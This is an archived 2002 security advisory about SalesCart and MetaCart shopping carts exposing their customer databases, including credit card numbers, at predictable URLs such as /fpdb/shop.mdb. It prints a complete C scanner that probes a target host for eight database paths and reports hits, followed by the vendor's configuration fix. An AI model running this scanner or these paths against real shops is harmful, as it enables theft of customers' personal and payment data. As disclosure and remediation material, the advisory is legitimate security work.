Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: web5478.htm

salescart, metacart remote database access



24th Jun 2002 [SBWID-5478]
COMMAND

	salescart, metacart remote database access

SYSTEMS AFFECTED

	salescart up to 24 June 2002 ?

PROBLEM

	Thanks to Tacettin Karadeniz [tacettinkaradeniz @ yahoo.com] report :
	

	In a business website which is made by Salescart, all  customer  records
	related to that website are reachable.  All  database  can  be  hide  to
	shop.mdb file, in fpdb directory. Any user can be  reach  this  database
	whithous permission. There are some special informations  this  database
	and they are; name, surname, adress, e-mail, phone number,  credit  card
	number, company name ... The credit card numbers  in  shop.mdb  file  is
	placed in query part.
	

	Accessing any of the following URL will return the database used by  the
	product:
	

	http://xxxshop.com/fpdb/shop.mdb

	

	

	 Exploit :

	 =========

	

	/* Salescart ve Metacart kullanILan bir alI$veri$

	sitesindeki mu$teri

	kayItLarInI bulma */

	

	/* tacettinkaradeniz@yahoo.com    karadenizeregli@2002

	  */

	

	/* I LoVe CiLeK :>

	

	/* Not: Bu programI ba$tan sona ben yazmadIm. Sadece

	gerekli yerlerde degi$iklik yaparak istediGim duzene

	getirdim :> */

	

	#include <string.h>

	#include <netdb.h>

	#include <ctype.h>

	#include <arpa/nameser.h>

	#include <sys/stat.h>

	#include <strings.h>

	#include <stdio.h>

	#include <stdlib.h>

	#include <unistd.h>

	#include <sys/socket.h>

	#include <fcntl.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <signal.h>

	#include <stdio.h>

	

	

	

	void main(int argc, char *argv[])

	{

	

	  char *bulunan;

	  char tampon[1024];

	  char mesaj[] = \"200\";

	  int toplam=0;

	  int sayac;

	  int buldum=0;

	  char shoptampon[20];

	  char *tmp[10];

	  char *hata[10];

	

	

	  int sock;

	  struct in_addr addr;

	  struct sockaddr_in sin;

	  struct hostent *he;

	  unsigned long giris;

	  unsigned long duzelt;

	

	

	tmp[1]=\"GET /fpdb/shop.mdb HTTP/1.0\\n\\n\";

	tmp[2]=\"GET /shoponline/fpdb/shop.mdb HTTP/1.0\\n\\n\";

	tmp[3]=\"GET /database/metacart.mdb HTTP/1.0\\n\\n\";

	tmp[4]=\"GET /shopping/database/metacart.mdb

	HTTP/1.0\\n\\n\";

	tmp[5]=\"GET /shop/database/metacart.mdb HTTP/1.0\\n\\n\";

	tmp[6]=\"GET /metacart/database/metacart.mdb

	HTTP/1.0\\n\\n\";

	tmp[7]=\"GET /mcartfree/database/metacart.mdb

	HTTP/1.0\\n\\n\";

	tmp[8]=\"GET /ASP/cart/database/metacart.mdb

	HTTP/1.0\\n\\n\";

	

	hata[1] = \"/fpdb/shop.mdb  \";

	hata[2] = \"/shoponline/fpdb/shop.mdb  \";

	hata[3] = \"/database/metacart.mdb  \";

	hata[4] = \"/shopping/database/metacart.mdb  \";

	hata[5] = \"/shop/database/metacart.mdb  \";

	hata[6] = \"/metacart/database/metacart.mdb  \";

	hata[7] = \"/mcartfree/database/metacart.mdb  \";

	hata[8] = \"/ASP/cart/database/metacart.mdb  \";

	

	

	

	if (argc<2)

	  {

	system(\"clear\");

	printf(\"\\n\\t _                     \");

	printf(\"\\n\\t|_  ._   _    _   |  o \");

	printf(\"\\n\\t|_  |   (/_  (_|  |  | \");

	printf(\"\\n\\t              _|       \");

	printf(\"\\n\\nSalescart - Metacart  (c) 2002 \");

	printf(\"\\nKullanImI : %s www.xxxshopxyz.com

	\\n\\n\",argv[0]);

	

	exit(0);

	}

	

	if ((he=gethostbyname(argv[1])) == NULL)

	{

	herror(\"gethostbyname\");

	exit(0);

	}

	system(\"clear\");

	printf(\"\\n\\t _                     \");

	printf(\"\\n\\t|_  ._   _    _   |  o \");

	printf(\"\\n\\t|_  |   (/_  (_|  |  | \");

	printf(\"\\n\\t              _|       \");

	printf(\"\\n\\t  Salescart - Metacart  (c) 2002 \");

	

	giris=inet_addr(argv[1]);

	

	duzelt=ntohl(giris);

	

	sock=socket(AF_INET, SOCK_STREAM, 0);

	bcopy(he->h_addr, (char *)&sin.sin_addr,

	he->h_length);

	sin.sin_family=AF_INET;

	sin.sin_port=htons(80);

	

	if (connect(sock, (struct sockaddr*)&sin,

	sizeof(sin))!=0)

	{

	perror(\"connect\");

	}

	send(sock, \"HEAD / HTTP/1.0\\n\\n\",17,0);

	

	recv(sock, tampon, sizeof(tampon),0);

	printf(\"%s\",tampon);

	close(sock);

	system(\"clear\");

	printf(\"Tarama YapILIyor..\\n\\n\");

	

	while(toplam++ < 8)

	{

	sock=socket(AF_INET, SOCK_STREAM, 0);

	bcopy(he->h_addr, (char *)&sin.sin_addr,

	he->h_length);

	sin.sin_family=AF_INET;

	sin.sin_port=htons(80);

	if (connect(sock, (struct sockaddr*)&sin,

	sizeof(sin))!=0)

	{

	perror(\"connect\");

	}

	

	for(sayac=0;sayac < 20;sayac++)

	{

	shoptampon[sayac] = \'\\0\';

	}

	

	send(sock, tmp[toplam],strlen(tmp[toplam]),0);

	recv(sock, shoptampon, sizeof(shoptampon),0);

	

	bulunan = strstr(shoptampon,mesaj);

	

	if( bulunan != NULL)

	{

	printf(\"%s : \",hata[toplam]);

	printf(\" Oleyyy.. Bulundu :\\)\\n\");++buldum;

	}

	close(sock);

	}

	

	if (buldum)

	{

	printf(\"\\n Tarama isLemi %s web sistesi icin

	bitti.\\n\", argv[1]);

	}

	else printf (\"\\n Uzgunum tarama sonucu bir veri

	bulunamamIstIr...\\n\\n\");

	

	}

	

	

SOLUTION

	 Update (28 June 2002)

	 ======

	

	This security issue is caused  when  Salescart  is  improperly  deployed
	using Microsoft FrontPage and Microsoft IIS and the  Microsoft  Internet
	Information    Web     Server     (IIS4.0/IIS5.0)     is     incorrectly
	administered/configured for the Web site  where  SalesCart  is  running.
	Specifically, the /fpdb virtual directory permissions  should  NOT  have
	READ permissions enabled. The setting is completely configurable by  the
	SalesCart Merchant using FrontPage by opening the  Web  site  and  right
	clicking the /fpdb folder, selecting properties and  unchecking  \"Allow
	Files to be Browsed\". Since this is an  issue  with  administering  the
	IIS web server and the FrontPage Web site rather  than  SalesCart,  this
	can only be corrected by the SalesCart Merchant or the Internet  Service
	Provider. See this knowledge base  article  from  the  vendor  for  more
	information.
	

	http://support.salescart.com/kb/KB-details.asp?key=5077

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH